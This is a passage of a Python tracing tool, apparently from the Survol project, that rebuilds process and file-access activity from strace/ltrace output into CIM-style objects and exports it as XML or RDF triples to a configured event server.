scannerFunction = BufferScanners[scannerKey]
# This returns a list of strings.
# TODO: In a second stage, this will return CIM objects.
lstResults = scannerFunction(aBuffer)
if lstResults:
if self.m_parsedData == None:
self.m_parsedData = {}
if scannerKey in self.m_parsedData:
self.m_parsedData[scannerKey] += lstResults
else:
self.m_parsedData[scannerKey] = lstResults
def has_parsed_data(self):
return self.m_parsedData != None
def parsed_data_to_XML(self, strm, margin, direction):
if self.m_parsedData:
submargin = margin + " "
for scannerKey in self.m_parsedData:
# TODO: Have a specific tag for the list.
scannerKeySet = scannerKey + "_List"
strm.write("%s<%s direction='%s'>\n" % ( margin, scannerKeySet, direction ) )
scannerVal = self.m_parsedData[scannerKey]
for scanResult in scannerVal:
strm.write("%s<%s>%s</%s>\n" % ( submargin, scannerKey, scanResult, scannerKey ) )
strm.write("%s</%s>\n" % ( margin, scannerKeySet ) )
# This receives all read() and write() buffers displayed by strace or ltrace,
# decodes them and tries to rebuild a complete logical message if it seems
# to be truncated.
# It then analyses the logical pieces.
def append_io_buffer(self, aFragment, szFragment = 0):
decodedFragment = DecodeOctalEscapeSequence(aFragment)
        # Typical buffer sizes are multiples of 0x100 (decimal, then hexadecimal):
# 256 100 #
# 512 200 #
# 12288 3000 #
# 49152 c000 #
# 65536 10000 #
# 262144 40000 #
isSegment = \
( ( szFragment % 0x100 == 0 ) and ( szFragment <= 0x1000) ) \
or ( ( szFragment % 0x1000 == 0 ) and ( szFragment <= 0x10000) ) \
or ( ( szFragment % 0x10000 == 0 ) and ( szFragment <= 0x100000) ) \
or ( ( szFragment % 0x100000 == 0 ) )
if isSegment and (szFragment == len(decodedFragment)):
if self.m_currentBuffer:
self.m_currentBuffer += decodedFragment
else:
self.m_currentBuffer = decodedFragment
else:
if self.m_currentBuffer:
self.__analyse_io_buffer(self.m_currentBuffer)
# Reuse memory.
del self.m_currentBuffer
self.m_currentBuffer = None
self.__analyse_io_buffer(decodedFragment)
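# Minimal usage sketch for BufferConcatenator (illustrative only, never called
# in this module). A fragment whose declared size is a "round" value such as
# 0x100 and which matches the decoded length is treated as a truncated segment
# and buffered; the next non-segment fragment flushes the accumulated buffer to
# the scanners and is then analysed on its own. Whether any parsed data shows
# up depends on which optional scanners (for example the SQL one) were loaded.
def _example_buffer_concatenator():
    concatenator = BufferConcatenator()
    concatenator.append_io_buffer("A" * 256, 256)         # buffered as a truncated segment
    concatenator.append_io_buffer("SELECT x FROM y", 15)  # flushes the buffer, then analysed alone
    return concatenator.has_parsed_data()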
################################################################################
G_FilesToPackagesCache = None
G_SameMachine = None
# This is a dictionary (indexed by processes) of dictionaries (indexed by files).
# It contains file accesses, which are objects representing what happens
# to a file between its opening and closing by a process.
G_cacheFileAccesses = {}
# This models an open/read-or-write/close access from a process to a file.
# The same process may access the same file several times,
# producing several FileAccess objects.
# This is displayed in XML as a single tag:
# <FileAccess OpenTime="" CloseTime="" etc... />
class FileAccess:
def __init__(self,objProcess,objDataFile):
self.OpenTime = None
self.CloseTime = None
self.m_objectCIM_Process = objProcess
self.m_objectCIM_DataFile = objDataFile
objProcess.m_ProcessFileAccesses.append(self)
objDataFile.m_DataFileFileAccesses.append(self)
def SetOpenTime(self, timeStamp):
global G_cacheFileAccesses
try:
self.NumOpen += 1
except AttributeError:
self.NumOpen = 1
if not self.OpenTime or (timeStamp < self.OpenTime):
self.OpenTime = timeStamp
if G_SameMachine:
try:
filStat = os.stat( self.m_objectCIM_DataFile.Name )
self.OpenSize = filStat.st_size
except:
pass
# Strictly speaking, from now on, this is accessible from the cache.
G_cacheFileAccesses[self.m_objectCIM_Process][self.m_objectCIM_DataFile] = self
def SetCloseTime(self, timeStamp):
global G_cacheFileAccesses
# Maybe the file was never closed.
if not getattr(self,"CloseTime",0) or (timeStamp < self.CloseTime):
self.CloseTime = timeStamp
if G_SameMachine:
try:
filStat = os.stat( self.m_objectCIM_DataFile.Name )
self.CloseSize = filStat.st_size
except:
pass
# Then remove the object from the cache so it cannot be returned
# anymore from this process and this file because it is closed.
del G_cacheFileAccesses[self.m_objectCIM_Process][self.m_objectCIM_DataFile]
def _analyze_new_buffer(self, isRead, buffer_size, aBuffer):
if not aBuffer:
return
# This does not apply to files.
if self.m_objectCIM_DataFile.is_plain_file():
return
if isRead:
try:
self.m_bufConcatRead
except AttributeError:
self.m_bufConcatRead = BufferConcatenator()
concatBuf = self.m_bufConcatRead
else:
try:
self.m_bufConcatWrite
except AttributeError:
self.m_bufConcatWrite = BufferConcatenator()
concatBuf = self.m_bufConcatWrite
try:
concatBuf.append_io_buffer(aBuffer, buffer_size)
except Exception as exc:
# Example: '[pid 5602] 19:59:20.590740 <... read resumed> "... end of read() content"..., 32768) = 4096 <0.037642>'
sys.stdout.write("Cannot parse:%s szBuffer=%s: %s\n" % (aBuffer, buffer_size, exc))
exit(1)
def set_read_bytes_number(self, read_bytes_number, bufferRead):
try:
self.NumReads += 1
except AttributeError:
self.NumReads = 1
try:
self.BytesRead += read_bytes_number
except AttributeError:
self.BytesRead = read_bytes_number
self._analyze_new_buffer(True, read_bytes_number, bufferRead)
def set_written_bytes_number(self, written_bytes_number, bufferWrite):
try:
self.NumWrites += 1
except AttributeError:
self.NumWrites = 1
try:
self.BytesWritten += written_bytes_number
except AttributeError:
self.BytesWritten = written_bytes_number
self._analyze_new_buffer(False, written_bytes_number, bufferWrite)
def TagXML(self,strm,margin,displayedFromProcess):
strm.write("%s<Access" % ( margin ) )
if displayedFromProcess:
if self.m_objectCIM_Process:
strm.write(" Process='%s'" % ( self.m_objectCIM_Process.Handle ) )
else:
if self.m_objectCIM_DataFile:
strm.write(" File='%s'" % ( self.m_objectCIM_DataFile.Name ) )
if self.OpenTime:
strm.write(" OpenTime='%s'" % _timestamp_to_str( self.OpenTime ) )
if getattr(self,'OpenSize',0):
strm.write(" OpenSize='%s'" % ( self.OpenSize ) )
if self.CloseTime:
strm.write(" CloseTime='%s'" % _timestamp_to_str( self.CloseTime ) )
if getattr(self,'CloseSize',0):
strm.write(" CloseSize='%s'" % ( self.CloseSize ) )
if getattr(self,'NumReads',0):
strm.write(" NumReads='%s'" % ( self.NumReads ) )
if getattr(self,'BytesRead',0):
strm.write(" BytesRead='%s'" % ( self.BytesRead ) )
if getattr(self,'NumWrites',0):
strm.write(" NumWrites='%s'" % ( self.NumWrites ) )
if getattr(self,'BytesWritten',0):
strm.write(" BytesWritten='%s'" % ( self.BytesWritten ) )
accRead = getattr(self,'m_bufConcatRead',None)
accWrite = getattr(self,'m_bufConcatWrite',None)
if (accRead and accRead.has_parsed_data()) or (accWrite and accWrite.has_parsed_data()):
strm.write(" >\n" )
submargin = margin + " "
if accRead and accRead.has_parsed_data():
accRead.parsed_data_to_XML(strm, submargin, "Read")
if accWrite and accWrite.has_parsed_data():
accWrite.parsed_data_to_XML(strm, submargin, "Write")
strm.write("%s</Access>\n" % ( margin ) )
else:
strm.write(" />\n" )
@staticmethod
def lookup_file_access(objProcess,objDataFile):
global G_cacheFileAccesses
assert G_cacheFileAccesses is not None
try:
filAcc = G_cacheFileAccesses[objProcess][objDataFile]
except KeyError:
filAcc = FileAccess(objProcess,objDataFile)
try:
G_cacheFileAccesses[objProcess][objDataFile] = filAcc
except KeyError:
G_cacheFileAccesses[objProcess] = {objDataFile : filAcc}
return filAcc
@staticmethod
def serialize_list_to_XML(strm,vecFilesAccesses,margin,displayedFromProcess):
if not vecFilesAccesses:
return
subMargin = margin + " "
strm.write("%s<FileAccesses>\n" % ( margin ) )
for filAcc in vecFilesAccesses:
filAcc.TagXML(strm,subMargin,displayedFromProcess)
strm.write("%s</FileAccesses>\n" % ( margin ) )
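# For orientation, FileAccess.TagXML emits a single tag roughly of this shape
# (the attribute values below are made up for the example):
#     <Access Process='5489' OpenTime='2020-01-01 19:59:20.590740'
#             NumReads='3' BytesRead='12288' NumWrites='1' BytesWritten='512' />
# When the buffer scanners detected something (for example SQL queries), the tag
# is not self-closing and contains one <SqlQuery_List direction='Read'> or
# <SqlQuery_List direction='Write'> element with the matched queries.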
################################################################################
# When replaying a session, it is not worth getting information about processes
# because they do not exist anymore.
G_ReplayMode = False
# The date where the test was run. Loaded from the ini file when replaying.
G_Today = None
def _timestamp_to_str(timStamp):
# 0 tm_year (for example, 1993)
# 1 tm_mon range [1, 12]
# 2 tm_mday range [1, 31]
# 3 tm_hour range [0, 23]
# 4 tm_min range [0, 59]
# 5 tm_sec range [0, 61]; see (2) in strftime() description
# 6 tm_wday range [0, 6], Monday is 0
# 7 tm_yday range [1, 366]
# 8 tm_isdst 0, 1 or -1; see below
# Today's date can change so we can reproduce a run.
if timStamp:
return G_Today + " " + timStamp
else:
return G_Today + " 00:00:00.000000"
################################################################################
# FIXME: Is it really needed ? And safe ??
#sys.path.append("../..")
# Import this now, and not in the destructor, to avoid the error:
# "sys.meta_path must be a list of import hooks"
# This module is needed for storing the generated data into a RDF file.
try:
if is_py3:
if ".." not in sys.path:
sys.path.append("..")
else:
if "../survol" not in sys.path:
sys.path.append("../survol")
from survol import lib_event
except ImportError:
lib_event = None
# This objects groups triples to send to the HTTP server, and periodically wakes up to send them.
# But if the server name is a file, the RDF content is instead stored to this file by the object destructor.
class HttpTriplesClient(object):
def __init__(self):
self._triples_list = []
# Threaded mode does not work when creating the server in the same process.
# For safety, this reverts to a simpler mode where the triples are sent
# in block at the end of the execution.
# TODO: Test this with thread mode.
self._is_threaded_client = False
        # Tests if this is an output RDF file, or rather None or the URL of a Survol agent.
self._server_is_file = G_UpdateServer and not(
G_UpdateServer.lower().startswith("http:")
or G_UpdateServer.lower().startswith("https:") )
if self._server_is_file:
print("G_UpdateServer=", G_UpdateServer, " IS FILE")
return
elif G_UpdateServer:
self._is_valid_http_client = True
if self._is_threaded_client:
self._shared_lock = threading.Lock()
self._client_thread = threading.Thread(target = self.run)
# If leaving too early, some data might be lost.
self._client_thread.daemon = True
self._client_thread.start()
def http_client_shutdown(self):
print("HttpTriplesClient.http_client_shutdown")
if self._server_is_file:
if not lib_event:
raise Exception("lib_event was not imported")
lib_event.json_triples_to_rdf(self._triples_list, G_UpdateServer)
print("Stored RDF content to", G_UpdateServer)
elif G_UpdateServer:
if self._is_threaded_client:
self._push_triples_to_server_threaded()
else:
# FIXME: The URL event_put.py sometimes times out, on Python 3 and only
# FIXME: ... if the server is started by the test program (pytest or unittest).
triples_as_bytes, sent_triples_number = self._pop_triples_to_bytes()
if triples_as_bytes:
received_triples_number = self._send_bytes_to_server(triples_as_bytes)
if received_triples_number != sent_triples_number:
raise Exception("Lost triples: %d != %d\n" % (received_triples_number, sent_triples_number))
def _pop_triples_to_bytes(self):
triples_number = len(self._triples_list)
if triples_number:
triples_as_bytes = json.dumps(self._triples_list)
if is_py3:
assert isinstance(triples_as_bytes, str)
triples_as_bytes = triples_as_bytes.encode('utf-8')
assert isinstance(triples_as_bytes, bytes)
else:
assert isinstance(triples_as_bytes, str)
self._triples_list = []
else:
triples_as_bytes = None
return triples_as_bytes, triples_number
def _send_bytes_to_server(self, triples_as_bytes):
assert isinstance(triples_as_bytes, six.binary_type)
assert not self._server_is_file
if not self._is_valid_http_client:
return -1
try:
req = urllib2.Request(G_UpdateServer)
print("len(triples_as_bytes)=%d\n" % len(triples_as_bytes))
urlopen_result = urllib2.urlopen(req, data=triples_as_bytes, timeout=30.0)
server_response = urlopen_result.read()
json_response = json.loads(server_response)
if json_response['success'] != 'true':
raise Exception("Event server error message=%s\n" % json_response['error_message'])
received_triples_number = int(json_response['triples_number'])
return received_triples_number
except Exception as server_exception:
sys.stdout.write("Event server error=%s\n" % str(server_exception))
self._is_valid_http_client = False
raise
def _push_triples_to_server_threaded(self):
assert not self._server_is_file
assert self._is_threaded_client
self._shared_lock.acquire()
triples_as_bytes, sent_triples_number = self._pop_triples_to_bytes()
# Immediately unlocked so no need to wait for the server.
self._shared_lock.release()
if triples_as_bytes:
received_triples_number = self._send_bytes_to_server(triples_as_bytes)
if received_triples_number != sent_triples_number:
raise Exception("Lost triples: %d != %d\n" % (received_triples_number, sent_triples_number))
# This thread functor loops on the container of triples.
# It formats them in JSON and sends them to the URL of the events server.
def run(self):
assert self._is_threaded_client
while True:
time.sleep(2.0)
self._push_triples_to_server_threaded()
def queue_triples_for_sending(self, json_triple):
if self._server_is_file:
#assert not self._is_threaded_client
# Just append the triple, no need to synchronise.
self._triples_list.append(json_triple)
elif G_UpdateServer:
if self._is_threaded_client:
self._shared_lock.acquire()
self._triples_list.append(json_triple)
self._shared_lock.release()
else:
self._triples_list.append(json_triple)
# This is the Survol server which is notified of all updates
# of CIM objects. These updates can then be displayed in Survol Web clients.
# It must be a plain Web server to be hosted by Apache or IIS.
G_UpdateServer = None
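# Hedged usage sketch (defined only for illustration, never invoked here).
# With G_UpdateServer pointing to a plain file path, every CIM attribute update
# is queued as a triple and written out as RDF by http_client_shutdown(); with
# an "http://..." URL the triples would instead be POSTed to a Survol agent.
# The output path below is an assumption made up for this example.
def _example_http_triples_client():
    global G_UpdateServer, G_httpClient
    if lib_event is None:
        return  # The optional survol package is needed to serialize triples to RDF.
    G_UpdateServer = "/tmp/dockit_example.rdf"
    G_httpClient = HttpTriplesClient()
    # From now on, any CIM attribute update is broadcast through G_httpClient.
    CIM_NetworkAdapter("192.168.0.1")
    G_httpClient.http_client_shutdown()
    G_UpdateServer = None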
################################################################################
# attr=AccessTime attrVal=1518262584.92 <type 'float'>
def TimeT_to_DateTime(stTimeT):
# Or utcfromtimestamp
return datetime.datetime.strftime( datetime.datetime.fromtimestamp(stTimeT), "%H:%M:%S:%f")
################################################################################
# This returns only leaf classes.
def leaf_derived_classes(the_class):
current_subclasses = the_class.__subclasses__()
return set([sub_class for sub_class in current_subclasses if not leaf_derived_classes(sub_class)]).union(
[sub_sub_class for sub_class in current_subclasses for sub_sub_class in leaf_derived_classes(sub_class)])
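# Small self-contained illustration of leaf_derived_classes (never called here):
# only classes without subclasses of their own are returned.
def _example_leaf_derived_classes():
    class Base(object): pass
    class Middle(Base): pass
    class Leaf1(Middle): pass
    class Leaf2(Base): pass
    assert leaf_derived_classes(Base) == {Leaf1, Leaf2}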
# CIM classes are defined as plain Python classes plus their attributes.
# Therefore, CIM attributes are mixed with Python ones.
# This function is a rule-thumb test to check if an attribute of a class
# is a CIM attribute. It works because there are very few non-CIM attributes.
def IsCIM(attr, attr_val):
return not callable(attr_val) and not attr.startswith("__") and not attr.startswith("m_")
# This identifies CIM attribute which is date or time and must be displayed as such.
def _is_time_stamp(attr):
return attr.find("Date") > 0 or attr.find("Time") > 0
# This is the base class of all CIM_xxx classes. It does the serialization
# into XML and also sends updates events to the Survol server if there is one.
class CIM_XmlMarshaller(object):
def __init__(self):
pass
def PlainToXML(self,strm,subMargin):
try:
# Optional members order.
attrExtra = self.__class__.m_attributes_priorities
except AttributeError:
attrExtra = []
start = len(attrExtra)
enumAttrs = {}
for elt in dir(self):
enumAttrs[ elt ] = start
start += 1
start = 0
for elt in attrExtra:
enumAttrs[ elt ] = start
start += 1
dictAttrs = dict((val,key) for (key,val) in enumAttrs.items())
for idx in sorted(dictAttrs.keys()):
attr = dictAttrs[idx]
try:
attrVal = getattr(self,attr)
except AttributeError:
continue
if IsCIM(attr,attrVal):
# FIXME: Not very reliable.
if _is_time_stamp(attr):
attrVal = _timestamp_to_str(attrVal)
if attrVal:
# No need to write empty strings.
strm.write("%s<%s>%s</%s>\n" % ( subMargin, attr, attrVal, attr ) )
def HttpUpdateRequest(self,**objJson):
G_httpClient.queue_triples_for_sending(objJson)
def SendUpdateToServer(self, attrNam, oldAttrVal, attrVal):
# These are the properties which uniquely define the object.
# There are always sent even if they did not change,
# otherwise the object could not be identified.
theSubjMoniker = self.get_survol_moniker()
# TODO: If the attribute is part of the ontology, just inform about the object creation.
# TODO: Some attributes could be the moniker of another object.
# TODO: AND THEREFORE, SEND LINKS, NOT ONLY LITERALS !!!
# OTHERWISE NO EDGES !!
if oldAttrVal and isinstance( oldAttrVal, CIM_XmlMarshaller):
raise Exception("Not implemented yet")
objMonikerOld = oldAttrVal.get_survol_moniker()
attrNamDelete = attrNam + "?predicate_delete"
self.HttpUpdateRequest(subject=theSubjMoniker,predicate=attrNam,object=objMonikerOld )
# For example a file being opened by a process, or a process started by a user etc...
if isinstance( attrVal, CIM_XmlMarshaller):
objMoniker = attrVal.get_survol_moniker()
self.HttpUpdateRequest(subject=theSubjMoniker,predicate=attrNam,object=objMoniker)
else:
self.HttpUpdateRequest(subject=theSubjMoniker,predicate=attrNam,object=attrVal)
# Any object change is broadcast to a Survol server.
def __setattr__(self, attrNam, attrVal):
# First, change the value, because it might be needed to calculate the moniker.
try:
oldAttrVal = self.__dict__[attrNam]
except:
oldAttrVal = None
self.__dict__[attrNam] = attrVal
#https://stackoverflow.com/questions/8600161/executing-periodic-actions-in-python
if G_UpdateServer:
if oldAttrVal != attrVal:
if IsCIM(attrNam,attrVal):
self.SendUpdateToServer(attrNam, oldAttrVal, attrVal)
@classmethod
def DisplaySummary(cls, fd_summary_file, cimKeyValuePairs):
pass
@classmethod
def XMLSummary(cls, fd_summary_file, cimKeyValuePairs):
namClass = cls.__name__
margin = " "
subMargin = margin + margin
for objPath,objInstance in sorted(G_mapCacheObjects[namClass].items()):
fd_summary_file.write("%s<%s>\n" % (margin, namClass))
objInstance.PlainToXML(fd_summary_file, subMargin)
fd_summary_file.write("%s</%s>\n" % (margin, namClass))
@classmethod
def CreateMonikerKey(cls, *args):
# The input arguments must be in the same order as the ontology.
#sys.stdout.write("CreateMonikerKey %s %s %s\n"%(cls.__name__,str(cls.cim_ontology_list),str(args)))
mnk = cls.__name__ + "." + ",".join('%s="%s"' % (k, v) for k, v in zip(cls.cim_ontology_list, args))
#sys.stdout.write("CreateMonikerKey mnk=%s\n"%mnk)
return mnk
# This object has a class name, an ontology which is an ordered list
# of attributes names, and several attributes in the object itself.
# This method wraps the class name and these attributes and their values,
# into an object which is used to store an event related to this object.
# JSON escapes special characters in strings.
def get_survol_moniker(self):
attributes_dict = {attribute_key: getattr(self, attribute_key) for attribute_key in self.cim_ontology_list}
return (self.__class__.__name__, attributes_dict)
def __repr__(self):
mnk = self.__class__.__name__ + "." + ",".join( '%s="%s"' % (k,getattr(self,k)) for k in self.cim_ontology_list )
return "%s" % mnk
@staticmethod
def create_instance_from_class_name(cim_class_name, **cim_attributes_dict):
cim_class_definition = _class_name_to_subclass[cim_class_name]
attributes_list = [cim_attributes_dict[key] for key in cim_class_definition.cim_ontology_list]
return cim_class_definition(*attributes_list)
################################################################################
# Read from a real process or from the ini file when replaying a session.
G_CurrentDirectory = u""
# The CIM_xxx classes are taken from Common Information Model standard.
# They share some properties and are adding more.
# class CIM_ComputerSystem : CIM_System
# {
# string Caption;
# string Description;
# datetime InstallDate;
# string Status;
# string CreationClassName;
# string Name;
# string PrimaryOwnerContact;
# string PrimaryOwnerName;
# string Roles[];
# string NameFormat;
# }
class CIM_ComputerSystem(CIM_XmlMarshaller):
def __init__(self, hostname):
super(CIM_ComputerSystem, self).__init__()
self.Name = hostname.lower() # This is a convention.
if not G_ReplayMode and psutil:
vm = psutil.virtual_memory()
self.VirtualMemoryTotal = vm[0]
self.VirtualMemoryAvailable = vm[1]
self.VirtualMemoryUsed = vm[3]
self.VirtualMemoryFree = vm[4]
try:
cf = psutil.cpu_freq()
if cf:
self.CpuCurrent = cf[0]
self.CpuMinimum = cf[1]
self.CpuMaximum = cf[2]
except AttributeError:
pass
cim_ontology_list = ['Name']
#
# class CIM_OperatingSystem : CIM_LogicalElement
# {
# string Caption;
# string CreationClassName;
# string CSCreationClassName;
# string CSName;
# sint16 CurrentTimeZone;
# string Description;
# boolean Distributed;
# uint64 FreePhysicalMemory;
# uint64 FreeSpaceInPagingFiles;
# uint64 FreeVirtualMemory;
# datetime InstallDate;
# datetime LastBootUpTime;
# datetime LocalDateTime;
# uint32 MaxNumberOfProcesses;
# uint64 MaxProcessMemorySize;
# string Name;
# uint32 NumberOfLicensedUsers;
# uint32 NumberOfProcesses;
# uint32 NumberOfUsers;
# uint16 OSType;
# string OtherTypeDescription;
# uint64 SizeStoredInPagingFiles;
# string Status;
# uint64 TotalSwapSpaceSize;
# uint64 TotalVirtualMemorySize;
# uint64 TotalVisibleMemorySize;
# string Version;
# };
class CIM_OperatingSystem(CIM_XmlMarshaller):
def __init__(self):
super(CIM_OperatingSystem, self).__init__()
if not G_ReplayMode:
self.OSType = sys.platform
self.Name = os.name
self.System = platform.system()
self.Release = platform.release()
self.Platform = platform.platform()
cim_ontology_list = []
#
# class CIM_NetworkAdapter : CIM_LogicalDevice
# {
# boolean AutoSense;
# uint16 Availability;
# string Caption;
# uint32 ConfigManagerErrorCode;
# boolean ConfigManagerUserConfig;
# string CreationClassName;
# string Description;
# string DeviceID;
# boolean ErrorCleared;
# string ErrorDescription;
# datetime InstallDate;
# uint32 LastErrorCode;
# uint64 MaxSpeed;
# string Name;
# string NetworkAddresses[];
# string PermanentAddress;
# string PNPDeviceID;
# uint16 PowerManagementCapabilities[];
# boolean PowerManagementSupported;
# uint64 Speed;
# string Status;
# uint16 StatusInfo;
# string SystemCreationClassName;
# string SystemName;
# };
class CIM_NetworkAdapter(CIM_XmlMarshaller):
def __init__(self, address):
super(CIM_NetworkAdapter, self).__init__()
self.Name = address
self.PermanentAddress = address
cim_ontology_list = ['Name']
# class CIM_Process : CIM_LogicalElement
# {
# string Caption;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Description;
# uint16 ExecutionState;
# string Handle;
# datetime InstallDate;
# uint64 KernelModeTime;
# string Name;
# string OSCreationClassName;
# string OSName;
# uint32 Priority;
# string Status;
# datetime TerminationDate;
# uint64 UserModeTime;
# uint64 WorkingSetSize;
# };
class CIM_Process(CIM_XmlMarshaller):
def __init__(self, proc_id):
super(CIM_Process, self).__init__()
# sys.stdout.write("CIM_Process proc_id=%s\n"%proc_id)
# SOME MEMBERS MUST BE DISPLAYED AND FOLLOW CIM CONVENTION.
self.Handle = proc_id
self.m_parentProcess = None
self.m_subProcesses = set()
self.CreationDate = None
self.TerminationDate = None
# This contains all the files objects accessed by this process.
# It is used when creating a DockerFile.
# It is a set, so each file appears only once.
self.m_ProcessFileAccesses = []
# TODO: ADD AN ARRAY OF CIM_DataFile
# AND THE ATTRIBUTES COULD CONTAIN THE DATA OF m_ProcessFileAccesses ???
if not G_ReplayMode:
# Maybe this cannot be accessed.
if is_platform_linux:
filnam_environ = "/proc/%d/environ" % self.Handle
try:
self.EnvironmentVariables = {}
with open(filnam_environ) as fd_env:
for one_pair in fd_env.readline().split('\0'):
env_key, colon, env_val = one_pair.partition('=')
if colon:
self.EnvironmentVariables[env_key] = env_val
except:
pass
if not G_ReplayMode and psutil:
try:
# FIXME: If rerunning a simulation, this does not make sense.
# Same for CIM_DataFile when this is not the target machine.
proc_obj = psutil.Process(proc_id)
except:
# Maybe this is replaying a former session and if so, the process exited.
proc_obj = None
else:
proc_obj = None
if proc_obj:
try:
self.Name = proc_obj.name()
exec_fil_nam = proc_obj.exe().replace("\\", "/")
# The process id is not needed because the path is absolute and the process CIM object
# should already be created. However, in the future it might reuse an existing context.
objects_context = ObjectsContext(proc_id)
exec_fil_obj = objects_context._class_model_to_object_path(CIM_DataFile, exec_fil_nam)
# The process id is not needed because the path is absolute.
# However, in the future it might reuse an existing context.
# Also, the process must not be inserted twice.
self.set_executable_path(exec_fil_obj)
self.CommandLine = proc_obj.cmdline()
except:
self.Name = None
try:
                # Maybe the process has exited.
self.Username = proc_obj.username()
self.Priority = proc_obj.nice()
except:
pass
try:
self.CurrentDirectory = proc_obj.cwd().replace("\\", "/")
except:
# psutil.ZombieProcess process still exists but it's a zombie
# Another possibility would be to use the parent process.
self.CurrentDirectory = G_CurrentDirectory
else:
if proc_id > 0:
self.Name = "pid=%s" % proc_id
else:
self.Name = ""
# TODO: This could be deduced with calls to setuid().
self.Username = ""
# TODO: This can be partly deduced with calls to chdir() etc...
# so it would not be necessary to install psutil.
self.CurrentDirectory = G_CurrentDirectory
self.Priority = 0
# In the general case, it is not possible to get the parent process,
# because it might replay a session. So, it can only rely on the successive function calls.
# Therefore, the parent processes must be stored before the subprocesses.
# If this process appears for the first time and there is only one other process, then it is its parent.
# It helps if the first vfork() is never finished, and if we did not get the main process id.
map_procs = G_mapCacheObjects[CIM_Process.__name__]
keys_procs = list(map_procs.keys())
cim_ontology_list = ['Handle']
@classmethod
def DisplaySummary(cls, fdSummaryFile, cimKeyValuePairs):
fdSummaryFile.write("Processes:\n")
list_CIM_Process = G_mapCacheObjects[CIM_Process.__name__]
for objPath, objInstance in sorted(list_CIM_Process.items()):
objInstance.Summarize(fdSummaryFile)
fdSummaryFile.write("\n")
m_attributes_priorities = ["Handle", "Name", "CommandLine", "CreationDate", "TerminationDate", "Priority"]
def XMLOneLevelSummary(self, strm, margin=" "):
self.m_isVisited = True
strm.write("%s<CIM_Process Handle='%s'>\n" % (margin, self.Handle))
subMargin = margin + " "
self.PlainToXML(strm, subMargin)
FileAccess.serialize_list_to_XML(strm, self.m_ProcessFileAccesses, subMargin, False)
for objInstance in self.m_subProcesses:
objInstance.XMLOneLevelSummary(strm, subMargin)
strm.write("%s</CIM_Process>\n" % (margin))
@staticmethod
def TopProcessFromProc(objInstance):
"""This returns the top-level parent of a process."""
while True:
parentProc = objInstance.m_parentProcess
if not parentProc: return objInstance
objInstance = parentProc
@staticmethod
def GetTopProcesses():
"""This returns a list of top-level processes, which have no parents."""
# This contains all subprocesses.
setSubProcs = set()
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
for oneSub in objInstance.m_subProcesses:
setSubProcs.add(oneSub)
lstTopLvl = []
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
if objInstance not in setSubProcs:
lstTopLvl.append(objInstance)
return lstTopLvl
# When parsing the last system call, it sets the termination date for all processes.
@staticmethod
def GlobalTerminationDate(timeEnd):
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
if not objInstance.TerminationDate:
objInstance.TerminationDate = timeEnd
@classmethod
def XMLSummary(cls, fd_summary_file, cimKeyValuePairs):
# Find unvisited processes. It does not start from G_top_ProcessId
# because maybe it contains several trees, or subtrees were missed etc...
for objPath, objInstance in sorted(G_mapCacheObjects[CIM_Process.__name__].items()):
try:
objInstance.m_isVisited
continue
except AttributeError:
pass
topObjProc = CIM_Process.TopProcessFromProc(objInstance)
topObjProc.XMLOneLevelSummary(fd_summary_file)
# In text mode, with no special formatting.
def Summarize(self, strm):
strm.write("Process id:%s\n" % self.Handle)
try:
if self.Executable:
strm.write(" Executable:%s\n" % self.Executable)
except AttributeError:
pass
if self.CreationDate:
strStart = _timestamp_to_str(self.CreationDate)
strm.write(" Start time:%s\n" % strStart)
if self.TerminationDate:
strEnd = _timestamp_to_str(self.TerminationDate)
strm.write(" End time:%s\n" % strEnd)
if self.m_parentProcess:
strm.write(" Parent:%s\n" % self.m_parentProcess.Handle)
def SetParentProcess(self, objCIM_Process):
# sys.stdout.write("SetParentProcess proc=%s parent=%s\n" % ( self.Handle, objCIM_Process.Handle ) )
if int(self.Handle) == int(objCIM_Process.Handle):
raise Exception("Self-parent")
self.m_parentProcess = objCIM_Process
self.ParentProcessID = objCIM_Process.Handle
objCIM_Process.m_subProcesses.add(self)
def WaitProcessEnd(self, timeStamp, objCIM_Process):
# sys.stdout.write("WaitProcessEnd: %s linking to %s\n" % (self.Handle,objCIM_Process.Handle))
self.TerminationDate = timeStamp
if not self.m_parentProcess:
self.SetParentProcess(objCIM_Process)
# sys.stdout.write("WaitProcessEnd: %s not linked to %s\n" % (self.Handle,objCIM_Process.Handle))
elif self.m_parentProcess != objCIM_Process:
# sys.stdout.write("WaitProcessEnd: %s not %s\n" % (self.m_parentProcess.Handle,objCIM_Process.Handle))
pass
else:
# sys.stdout.write("WaitProcessEnd: %s already linked to %s\n" % (self.m_parentProcess.Handle,objCIM_Process.Handle))
pass
def set_executable_path(self, objCIM_DataFile):
assert (isinstance(objCIM_DataFile, CIM_DataFile))
self.Executable = objCIM_DataFile.Name
self.m_ExecutableObject = objCIM_DataFile
def set_command_line(self, lstCmdLine):
# TypeError: sequence item 7: expected string, dict found
if lstCmdLine:
self.CommandLine = " ".join([str(elt) for elt in lstCmdLine])
# The command line as a list is needed by Dockerfile.
self.m_commandList = lstCmdLine
def GetCommandLine(self):
try:
if self.CommandLine:
return self.CommandLine
except AttributeError:
pass
try:
commandLine = self.Executable
except AttributeError:
commandLine = ""
return commandLine
def GetCommandList(self):
try:
if self.m_commandList:
return self.m_commandList
except AttributeError:
pass
try:
commandList = [self.Executable]
except AttributeError:
commandList = []
return commandList
def SetThread(self):
self.IsThread = True
# Some system calls are relative to the current directory.
# Therefore, this traces current dir changes due to system calls.
def set_process_current_directory(self, currDirObject):
self.CurrentDirectory = currDirObject.Name
def GetProcessCurrentDir(self):
try:
return self.CurrentDirectory
except AttributeError:
            # Maybe it could not be obtained because the process exited too quickly.
return "UnknownCwd"
# This returns an object indexed by the file name and the process id.
# A file might have been opened several times by the same process.
# Therefore, once a file has been closed, the associated file access
# cannot be returned again.
def get_file_access(self, objCIM_DataFile):
one_file_access = FileAccess.lookup_file_access(self, objCIM_DataFile)
return one_file_access
# Other tools to consider:
# dtrace and blktrac and valgrind
# http://www.brendangregg.com/ebpf.html
# class CIM_LogicalFile : CIM_LogicalElement
# {
# string Caption;
# string Description;
# datetime InstallDate;
# string Status;
# uint32 AccessMask;
# boolean Archive;
# boolean Compressed;
# string CompressionMethod;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Drive;
# string EightDotThreeFileName;
# boolean Encrypted;
# string EncryptionMethod;
# string Name;
